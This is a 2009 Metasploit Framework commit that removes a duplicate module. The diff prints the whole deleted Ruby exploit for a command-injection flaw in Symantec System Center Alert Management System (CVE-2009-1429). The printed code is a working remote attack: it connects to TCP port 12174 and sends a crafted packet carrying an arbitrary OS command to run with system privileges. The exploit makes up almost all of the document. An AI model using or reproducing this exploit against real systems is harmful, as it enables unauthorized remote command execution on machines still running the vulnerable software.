oops, dupe of auxiliary/admin/symantec/cba_exec.rb

git-svn-id: file:///home/svn/framework3/trunk@7745 4d416f70-5f16-0410-b530-b9f4589650da
2009-12-07 21:28:53 +00:00 · 2009-12-07 21:28:53 +00:00 · 2dfcd26370
parent cb6fbe8894
commit 2dfcd26370
1 changed files with 0 additions and 84 deletions
--- a/modules/exploits/windows/antivirus/symantec_syscntr_cmdexec.rb
+++ b/modules/exploits/windows/antivirus/symantec_syscntr_cmdexec.rb
@ -1,84 +0,0 @@
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
-	rank = ExcellentRanking
-
-	include Msf::Exploit::Remote::Tcp
-
-	def initialize(info = {})
-		super(update_info(info,
-			'Name'           => 'Symantec System Center Alert Management System Arbitrary Command Execution',
-			'Description'    => %q{
-					Symantec System Center Alert Management System is prone to a remote command-injection vulnerability
-					because the application fails to properly sanitize user-supplied input.
-			},
-			'Author'         => [ 'Kingcope <kcope2[at]googlemail.com>', 'jduck' ],
-			'License'        => MSF_LICENSE,
-			'Version'        => '$Revision:$',
-			'References'     =>
-				[
-					[ 'CVE', '2009-1429' ],
-					[ 'BID', '34671' ],
-					[ 'OSVDB', '54157' ],
-					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-060/' ],
-					[ 'URL', 'http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20090428_02' ]
-				],
-			'Payload'        =>
-				{
-					'DisableNops' => true,
-					'Space'       => 1024,
-					'Compat'      =>
-						{
-							'PayloadType' => 'cmd',
-							'RequiredCmd' => 'generic perl telnet',
-						}
-				},
-			'Privileged'     => true,
-			'Platform'       => 'win',
-			'Targets'        => 
-				[
-					[ 'Automatic', { } ],
-				],
-			'DefaultTarget' => 0,
-			'DisclosureDate' => 'Apr 28 2009'))
-
-			register_options( 
-				[
-					Opt::RPORT(12174),
-					OptString.new('CMD', [ false, 'The OS command to execute', 'cmd /c echo metasploit > %SYSTEMDRIVE%\metasploit.txt']),
-				], self.class)
-	end
-
-	def exploit
-		connect
-		
-		len = 12 + datastore['CMD'].length
-		
-		data =  [0x00000000].pack('V')
-		data << len.chr
-		data << "\x00"
-		data << datastore['CMD']
-		data << " -123456789"
-		data << "\x00"
-		
-		print_status("Sending command: #{datastore['CMD']}")	
-		sock.put(data)
-		
-		res = sock.get_once
-		
-		if (!res)
-			print_error("Did not recieve data. Failed?")
-		else
-			print_status("Got data, execution successful!")
-		end
-		
-		disconnect
-	end
-end